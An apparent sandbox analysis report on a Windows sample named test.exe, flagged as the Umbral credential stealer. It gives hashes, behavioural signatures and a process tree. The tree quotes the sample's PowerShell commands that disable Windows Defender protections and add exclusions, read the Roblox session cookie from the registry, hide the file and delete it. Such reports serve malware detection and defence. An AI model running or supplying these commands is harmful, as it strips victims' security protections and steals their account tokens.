Overview

overview

10

Static

static

10

test.exe

windows7-x64

10

test.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    15-09-2024 00:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    test.exe

  • Size

    360KB

  • MD5

    d16b4139ed4406bce80daf7f64ea7f76

  • SHA1

    d1380cc067fe320dc16e43ac31208e2ce0d7fd5c

  • SHA256

    44806f5e8beab048f45916e5723a475bd20f2684929ec4cc92b1096168a4e32f

  • SHA512

    cee8211366528d5c5bb821a2c6c53f445b43659e43734ce9cb16a368dcd2d28d5e909c5e489482625ef73daa7b387d939829089c69961b3291a7e741b29a0fa6

  • SSDEEP

    6144:1loZM+rIkd8g+EtXHkv/iD4p9d0mkrHMp9YW3X2B0b8e1mLieq:XoZtL+EP8p9d0mkrHMp9YW3X2iVeq

Score
10/10
umbralcredential_accessdiscoveryexecutionspywarestealer

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\test.exe
    "C:\Users\Admin\AppData\Local\Temp\test.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2552
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1704
    • C:\Windows\system32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\test.exe"
      2⤵
      • Views/modifies file attributes
      PID:2756
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\test.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2764
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1416
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2608
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1452
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1668
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
        PID:1916
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        2⤵
          PID:2928
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:1316
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:3036
        • C:\Windows\system32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\test.exe" && pause
          2⤵
          • Deletes itself
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:2188
          • C:\Windows\system32\PING.EXE
            ping localhost
            3⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2164
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe"
        1⤵
          PID:2996

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          836b8da60fe9827c6e87591a710f0c2a

          SHA1

          7989b1baeb4008a520c965f87eab2331cd5ddb93

          SHA256

          d028ef0878a69ffdbdeaa6236c008df875d466b25f7545fe2a97b6ca6ff2aafa

          SHA512

          a3abb9e9b2d6df08f6e6a528b9b8e0cb7692f02cb87b8ee25f365e52d57459a22fbbc45e53b3d81a5683f40a4050e5b7ede07126a713a0181a87f2641c6444b4

          Download Submit

        • memory/1316-43-0x0000000002860000-0x0000000002868000-memory.dmp

          Filesize

          32KB

          Download

        • memory/1416-14-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/1416-15-0x00000000029F0000-0x00000000029F8000-memory.dmp

          Filesize

          32KB

          Download

        • memory/2552-0-0x000007FEF6313000-0x000007FEF6314000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2552-1-0x0000000000D70000-0x0000000000DD0000-memory.dmp

          Filesize

          384KB

          Download

        • memory/2552-2-0x000007FEF6310000-0x000007FEF6CFC000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/2552-47-0x000007FEF6310000-0x000007FEF6CFC000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/2764-7-0x000000001B550000-0x000000001B832000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/2764-8-0x00000000021D0000-0x00000000021D8000-memory.dmp

          Filesize

          32KB

          Download